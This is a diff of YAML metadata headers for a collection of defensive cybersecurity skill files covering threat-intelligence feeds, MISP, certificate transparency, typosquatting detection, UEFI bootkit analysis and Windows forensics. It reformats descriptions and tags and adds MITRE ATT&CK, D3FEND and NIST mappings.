+- mitre-attack
 - navigator
 - threat-intelligence
 - apt
 - ttp-mapping
 - stix
 - attackcti
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_ai_rmf:
 - MEASURE-2.7
 - MAP-5.1
 - MANAGE-2.4
 atlas_techniques:
 - AML.T0070
 - AML.T0066
 - AML.T0082
 d3fend_techniques:
 - File Metadata Consistency Validation
 - Application Protocol Command Analysis
 - Identifier Analysis
 - Content Format Conversion
 - Message Analysis
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1566.001
 - T1059.001
 - T1071.001
 - T1547.001
 - T1053.005
 ---
 # Analyzing Threat Actor TTPs with MITRE Navigator
@@ -1,17 +1,39 @@
 ---
 name: analyzing-threat-intelligence-feeds
-description: >
+description: 'Analyzes structured and unstructured threat intelligence feeds to extract
-  Analyzes structured and unstructured threat intelligence feeds to extract actionable indicators,
+  actionable indicators, adversary tactics, and campaign context. Use when ingesting
-  adversary tactics, and campaign context. Use when ingesting commercial or open-source CTI feeds,
+  commercial or open-source CTI feeds, evaluating feed quality, normalizing data into
-  evaluating feed quality, normalizing data into STIX 2.1 format, or enriching existing IOCs with
+  STIX 2.1 format, or enriching existing IOCs with campaign attribution. Activates
-  campaign attribution. Activates for requests involving ThreatConnect, Recorded Future, Mandiant
+  for requests involving ThreatConnect, Recorded Future, Mandiant Advantage, MISP,
-  Advantage, MISP, AlienVault OTX, or automated feed aggregation pipelines.
+  AlienVault OTX, or automated feed aggregation pipelines.
  '
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [STIX, TAXII, MITRE-ATT&CK, IOC, ThreatConnect, Recorded-Future, MISP, CTI, NIST-CSF]
+tags:
 - STIX
 - TAXII
 - MITRE-ATT&CK
 - IOC
 - ThreatConnect
 - Recorded-Future
 - MISP
 - CTI
 - NIST-CSF
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1071.001
 - T1566
 - T1568
 - T1583.001
 - T1102
 ---
 # Analyzing Threat Intelligence Feeds
@@ -1,17 +1,39 @@
 ---
 name: analyzing-threat-landscape-with-misp
-description: >-
+description: Analyze the threat landscape using MISP (Malware Information Sharing
-  Analyze the threat landscape using MISP (Malware Information Sharing Platform)
+  Platform) by querying event statistics, attribute distributions, threat actor galaxy
-  by querying event statistics, attribute distributions, threat actor galaxy
+  clusters, and tag trends over time. Uses PyMISP to pull event data, compute IOC
-  clusters, and tag trends over time. Uses PyMISP to pull event data, compute
+  type breakdowns, identify top threat actors and malware families, and generate threat
-  IOC type breakdowns, identify top threat actors and malware families, and
+  landscape reports with temporal trends.
  generate threat landscape reports with temporal trends.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [analyzing, threat, landscape, with]
+tags:
-version: "1.0"
+- threat-intelligence
 - misp
 - threat-landscape
 - ioc-analysis
 - cti
 - threat-sharing
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - File Metadata Consistency Validation
 - Application Protocol Command Analysis
 - Identifier Analysis
 - Content Format Conversion
 - Message Analysis
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1566
 - T1071.001
 - T1568
 - T1583.001
 - T1102
 ---
@@ -1,16 +1,63 @@
 ---
 name: analyzing-tls-certificate-transparency-logs
-description: >
+description: 'Queries Certificate Transparency logs via crt.sh and pycrtsh to detect
-  Queries Certificate Transparency logs via crt.sh and pycrtsh to detect phishing
+  phishing domains, unauthorized certificate issuance, and shadow IT. Monitors newly
-  domains, unauthorized certificate issuance, and shadow IT. Monitors newly issued
+  issued certificates for typosquatting and brand impersonation using Levenshtein
-  certificates for typosquatting and brand impersonation using Levenshtein distance.
+  distance. Use for proactive phishing domain detection and certificate monitoring.
-  Use for proactive phishing domain detection and certificate monitoring.
+
  '
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, tls, certificate, transparency]
+tags:
-version: "1.0"
+- certificate-transparency
 - ct-logs
 - crt-sh
 - phishing-detection
 - tls-monitoring
 - security-operations
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0073
 - AML.T0052
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1583.001
 - T1566.002
 - T1598.003
 - T1583.006
 mitre_f3:
  version: '1.1'
  tactics:
  - reconnaissance
  - resource-development
  - initial-access
  techniques:
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1593
    name: Search Open Websites/Domains
    tactic: reconnaissance
    source: attack
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
 ---
 # Analyzing TLS Certificate Transparency Logs
@@ -1,12 +1,62 @@
 ---
 name: analyzing-typosquatting-domains-with-dnstwist
-description: Detect typosquatting, homograph phishing, and brand impersonation domains using dnstwist to generate domain permutations and identify registered lookalike domains targeting your organization.
+description: Detect typosquatting, homograph phishing, and brand impersonation domains
  using dnstwist to generate domain permutations and identify registered lookalike
  domains targeting your organization.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [dnstwist, typosquatting, phishing, domain-monitoring, brand-protection, homograph, dns, threat-intelligence]
+tags:
-version: "1.0"
+- dnstwist
 - typosquatting
 - phishing
 - domain-monitoring
 - brand-protection
 - homograph
 - dns
 - threat-intelligence
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0073
 - AML.T0052
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1583.001
 - T1566.002
 - T1598.003
 - T1583.006
 mitre_f3:
  version: '1.1'
  tactics:
  - resource-development
  - reconnaissance
  - initial-access
  techniques:
  - id: T1583.001
    name: 'Acquire Infrastructure: Domains'
    tactic: resource-development
    source: attack
  - id: F1020.002
    name: 'Create Fake Materials: Fake Website'
    tactic: resource-development
    source: f3
  - id: T1598
    name: Phishing for Information
    tactic: reconnaissance
    source: attack
  - id: T1593
    name: Search Open Websites/Domains
    tactic: reconnaissance
    source: attack
  - id: T1660
    name: Phishing
    tactic: initial-access
    source: attack
 ---
 # Analyzing Typosquatting Domains with DNSTwist
@@ -1,19 +1,43 @@
 ---
 name: analyzing-uefi-bootkit-persistence
-description: >
+description: 'Analyzes UEFI bootkit persistence mechanisms including firmware implants
-  Analyzes UEFI bootkit persistence mechanisms including firmware implants in SPI flash,
+  in SPI flash, EFI System Partition (ESP) modifications, Secure Boot bypass techniques,
-  EFI System Partition (ESP) modifications, Secure Boot bypass techniques, and UEFI
+  and UEFI variable manipulation. Covers detection of known bootkit families (BlackLotus,
-  variable manipulation. Covers detection of known bootkit families (BlackLotus, LoJax,
+  LoJax, MosaicRegressor, MoonBounce, CosmicStrand), ESP partition forensic inspection,
  MosaicRegressor, MoonBounce, CosmicStrand), ESP partition forensic inspection,
  chipsec-based firmware integrity verification, and Secure Boot configuration auditing.
  Activates for requests involving UEFI malware analysis, firmware persistence investigation,
  boot chain integrity verification, or Secure Boot bypass detection.
  '
 domain: cybersecurity
 subdomain: firmware-security
-tags: [UEFI, bootkit, firmware, Secure-Boot, chipsec, ESP, persistence]
+tags:
 - UEFI
 - bootkit
 - firmware
 - Secure-Boot
 - chipsec
 - ESP
 - persistence
 version: 1.0.0
 author: mukul975
 license: Apache-2.0
 d3fend_techniques:
 - Platform Hardening
 - Restore Object
 - Platform Monitoring
 - Firmware Verification
 - Firmware Embedded Monitoring Code
 nist_csf:
 - ID.RA-01
 - PR.PS-01
 - PR.PS-02
 mitre_attack:
 - T1542.001
 - T1542.003
 - T1553.006
 - T1542
 - T1014
 ---
 # Analyzing UEFI Bootkit Persistence
@@ -1,12 +1,30 @@
 ---
 name: analyzing-usb-device-connection-history
-description: Investigate USB device connection history from Windows registry, event logs, and setupapi logs to track removable media usage and potential data exfiltration.
+description: Investigate USB device connection history from Windows registry, event
  logs, and setupapi logs to track removable media usage and potential data exfiltration.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, usb-forensics, removable-media, registry-analysis, data-exfiltration, device-history]
+tags:
-version: "1.0"
+- forensics
 - usb-forensics
 - removable-media
 - registry-analysis
 - data-exfiltration
 - device-history
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1052.001
 - T1025
 - T1091
 - T1005
 - T1074.001
 ---
 # Analyzing USB Device Connection History
@@ -1,16 +1,34 @@
 ---
 name: analyzing-web-server-logs-for-intrusion
-description: >-
+description: Parse Apache and Nginx access logs to detect SQL injection attempts,
-  Parse Apache and Nginx access logs to detect SQL injection attempts, local file inclusion,
+  local file inclusion, directory traversal, web scanner fingerprints, and brute-force
-  directory traversal, web scanner fingerprints, and brute-force patterns. Uses regex-based
+  patterns. Uses regex-based pattern matching against OWASP attack signatures, GeoIP
-  pattern matching against OWASP attack signatures, GeoIP enrichment for source attribution,
+  enrichment for source attribution, and statistical anomaly detection for request
-  and statistical anomaly detection for request frequency and response size outliers.
+  frequency and response size outliers.
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, web, server, logs]
+tags:
-version: "1.0"
+- web-log-analysis
 - apache-logs
 - nginx-logs
 - sql-injection-detection
 - lfi-detection
 - directory-traversal
 - intrusion-detection
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1190
 - T1059.007
 - T1110
 - T1595.002
 - T1505.003
 ---
@@ -1,19 +1,38 @@
 ---
 name: analyzing-windows-amcache-artifacts
-description: >
+description: 'Parses and analyzes the Windows Amcache.hve registry hive to extract
-  Parses and analyzes the Windows Amcache.hve registry hive to extract evidence
+  evidence of program execution, application installation, and driver loading for
-  of program execution, application installation, and driver loading for digital
+  digital forensics investigations. Uses Eric Zimmerman''s AmcacheParser and Timeline
-  forensics investigations. Uses Eric Zimmerman's AmcacheParser and Timeline
+  Explorer for artifact extraction, SHA-1 hash correlation with threat intel, and
-  Explorer for artifact extraction, SHA-1 hash correlation with threat intel,
+  timeline reconstruction. Activates for requests involving Amcache forensics, program
-  and timeline reconstruction. Activates for requests involving Amcache forensics,
+  execution evidence, Windows artifact analysis, or application compatibility cache
-  program execution evidence, Windows artifact analysis, or application compatibility
+  investigation.
-  cache investigation.
+
  '
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [amcache, windows-forensics, program-execution, AmcacheParser, eric-zimmerman, timeline-analysis, DFIR]
+tags:
 - amcache
 - windows-forensics
 - program-execution
 - AmcacheParser
 - eric-zimmerman
 - timeline-analysis
 - DFIR
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1070.004
 - T1070.006
 - T1036.005
 - T1014
 - T1005
 ---
 # Analyzing Windows Amcache Artifacts
@@ -1,16 +1,43 @@
 ---
 name: analyzing-windows-event-logs-in-splunk
-description: >
+description: 'Analyzes Windows Security, System, and Sysmon event logs in Splunk to
-  Analyzes Windows Security, System, and Sysmon event logs in Splunk to detect authentication attacks,
+  detect authentication attacks, privilege escalation, persistence mechanisms, and
-  privilege escalation, persistence mechanisms, and lateral movement using SPL queries mapped to
+  lateral movement using SPL queries mapped to MITRE ATT&CK techniques. Use when SOC
-  MITRE ATT&CK techniques. Use when SOC analysts need to investigate Windows-based threats,
+  analysts need to investigate Windows-based threats, build detection queries, or
-  build detection queries, or perform forensic timeline analysis of Windows endpoints and domain controllers.
+  perform forensic timeline analysis of Windows endpoints and domain controllers.
  '
 domain: cybersecurity
 subdomain: soc-operations
-tags: [soc, splunk, windows-events, sysmon, event-logs, mitre-attack, active-directory]
+tags:
-version: "1.0"
+- soc
 - splunk
 - windows-events
 - sysmon
 - event-logs
 - mitre-attack
 - active-directory
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Restore Access
 - Password Authentication
 - Biometric Authentication
 - Strong Password Policy
 - Restore User Account Access
 nist_csf:
 - DE.CM-01
 - DE.AE-02
 - RS.MA-01
 - DE.AE-06
 mitre_attack:
 - T1110
 - T1053.005
 - T1547.001
 - T1021.002
 - T1558.003
 - T1003.006
 ---
 # Analyzing Windows Event Logs in Splunk
@@ -1,12 +1,30 @@
 ---
 name: analyzing-windows-lnk-files-for-artifacts
-description: Parse Windows LNK shortcut files to extract target paths, timestamps, volume information, and machine identifiers for forensic timeline reconstruction.
+description: Parse Windows LNK shortcut files to extract target paths, timestamps,
  volume information, and machine identifiers for forensic timeline reconstruction.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, lnk-files, windows-artifacts, shortcut-analysis, timeline-reconstruction, evidence-collection]
+tags:
-version: "1.0"
+- forensics
 - lnk-files
 - windows-artifacts
 - shortcut-analysis
 - timeline-reconstruction
 - evidence-collection
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1547.001
 - T1204.002
 - T1005
 - T1025
 - T1074.001
 ---
 # Analyzing Windows LNK Files for Artifacts
--- a/Show More
+++ b/Show More